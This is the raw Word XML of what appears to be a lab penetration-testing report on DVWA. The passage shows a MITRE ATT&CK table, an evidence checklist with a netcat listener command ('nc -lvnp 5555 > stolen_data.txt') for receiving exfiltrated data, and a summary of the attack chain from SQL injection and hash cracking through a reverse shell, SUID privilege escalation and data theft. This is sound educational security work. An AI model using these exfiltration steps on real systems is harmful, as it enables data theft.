            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">File transferred via raw </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20C0DBE8" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21C11CDD" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E501C8" w14:paraId="25B8C802" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40421AF1" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Unencrypted plain-text transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43105935" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Exfiltration Over Unencrypted Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="653B0EEF" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>T1048.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E501C8" w14:paraId="258071A7" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CDDBEC2" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Non-standard port (5555) used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21EBDDA3" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Non-Standard Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70A282CA" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>T1571</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B94C74B" w14:textId="6176644D" w:rsidR="00E501C8" w:rsidRDefault="00B13552">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>6. Evidence Checklist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E501C8" w14:paraId="71C1A7BA" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="25AE67DB" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Evidence Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="2ED30DB5" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>What it proves</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E501C8" w14:paraId="578DEB0A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D4C75A5" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Screenshot: echo command creating secret.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="694A0425" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Sensitive file existed on target machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E501C8" w14:paraId="61B0FA36" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A7EB22D" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Screenshot: nc -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>lvnp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 5555 &gt; stolen_data.txt running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6986567D" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Listener was set up and ready on Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E501C8" w14:paraId="346E454A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D7BCCAC" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Screenshot: connect to [...] from [...] line in listener</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7167C144" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Target successfully connected and sent data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E501C8" w14:paraId="2421F9D1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0564FDD4" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Screenshot: cat stolen_data.txt output on Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E6A6E9B" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>File contents arrived intact on attacker machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E501C8" w14:paraId="791AD223" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="467981AB" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Wireshark filter </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>tcp.port</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> == 5555</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E70668C" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Network-level evidence of the file transfer in the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B13552">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>pcap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14FC7B48" w14:textId="539999B8" w:rsidR="00E501C8" w:rsidRDefault="00B13552">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>7. Full Attack Chain Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351248A8" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRPr="00B13552" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13552">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This finding represents the final stage of a complete, end-to-end attack chain demonstrated in this project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D51DB5F" w14:textId="77777777" w:rsidR="00B13552" w:rsidRDefault="00B13552">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6082B260" w14:textId="77777777" w:rsidR="00B13552" w:rsidRDefault="00B13552">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E501C8" w14:paraId="4569D699" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="197A2429" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="7DC9E52C" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Outcome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E501C8" w14:paraId="13E4919E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="085A911D" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>1. Reconnaissance (Nmap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="157DBDBC" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Discovered open ports and running services on the target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E501C8" w14:paraId="4CDD8F65" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42B31657" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2. SQL Injection (DVWA Low/Medium)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B6CED6E" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Extracted all usernames and password hashes from the database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E501C8" w14:paraId="3B40A9BD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AD2E809" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>3. Hash Cracking (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>hashcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="381C9303" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Cracked MD5 hashes, recovered plaintext admin credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E501C8" w14:paraId="3FA213AC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ABC94B9" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>4. Command Execution (Reverse Shell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FA2479C" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Gained remote command execution as www-data (low privilege)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E501C8" w14:paraId="46F5E57B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47D98BD2" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Privilege Escalation (SUID </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FD5C510" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Escalated from www-data to root (full system control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E501C8" w14:paraId="14C74920" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62718476" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>6. Data Exfiltration (this document)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37F38879" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Stole simulated sensitive customer data from the target system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C4D08D2" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Each stage directly enabled the next. Blocking any single stage in this chain would have stopped or significantly slowed the attack — reinforcing the importance of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-in-depth rather than relying on any single security control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725842F8" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>10. References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0E0666" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>MITRE ATT&amp;CK — T1005: Data from Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18185CE3" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>MITRE ATT&amp;CK — T1041: Exfiltration Over C2 Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B01E2B" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>MITRE ATT&amp;CK — T1048.003: Exfiltration Over Unencrypted Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7482502E" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>MITRE ATT&amp;CK — T1571: Non-Standard Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464AD897" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>NIST SP 800-61: Computer Security Incident Handling Guide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4063F7A4" w14:textId="77777777" w:rsidR="00E501C8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP — Data Exposure and Loss Prevention Guidelines</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E501C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25093E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2F857F8"/>
    <w:lvl w:ilvl="0" w:tplc="34B2F84C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1EE20B36">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="59E8B4FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5B822744">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="E5CC46A0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B6D45FDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
